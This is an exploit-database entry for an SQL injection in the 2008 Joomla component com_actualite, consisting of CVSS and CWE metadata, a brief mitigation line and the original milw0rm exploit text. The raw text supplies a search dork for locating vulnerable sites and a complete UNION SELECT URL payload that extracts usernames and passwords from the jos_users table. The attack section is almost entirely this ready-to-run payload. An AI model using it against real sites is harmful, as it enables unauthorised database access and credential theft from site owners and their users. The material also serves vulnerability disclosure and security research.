Joomla Component com_actualite SQL Injection

vendor:

com_actualite

by:

Stack-Terrorist

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_actualite

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Joomla Component com_actualite SQL Injection

SQL injection vulnerability in the com_actualite component in Joomla allows remote attackers to execute arbitrary SQL commands via the edit task in the id parameter, as demonstrated by injecting a UNION SELECT statement to retrieve usernames and passwords from the jos_users table.

Mitigation:

Update to a fixed version of the component or apply a patch provided by the vendor.

Source

Exploit-DB raw data:

##########################################
#
# Joomla Component com_actualite SQL Injection
#
##########################################
#
##AUTHOR : Stack-Terrorist [v40]
#
####HOME : http://v4-team.com
#
####MAiL : admin@v4-team.com
#
###########################################
#
# DORK 1 : allinurl: "com_actualite"
#
###########################################
EXPLOiT :

index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),password),3,4,5,6,7,8,9%20from%20jos_users/*

###########################################
-------------Stack-Terrorist--------------#
###########################################
------------admin@v4-team.com-------------#
###########################################
-------http://stack-terrorist.com---------#
###########################################

side note:
  <name>actualite</name>
  <creationDate>15/08/2006</creationDate>
  <author>assiya</author>
  <copyright></copyright>
  <authorEmail>assiya@pyxicom.com</authorEmail>

  <authorUrl>www.pyxicom.com</authorUrl>
  <version>1.0</version>
  <description>Composant pour la gestion des actualites de la CAF</description>

# milw0rm.com [2008-04-01]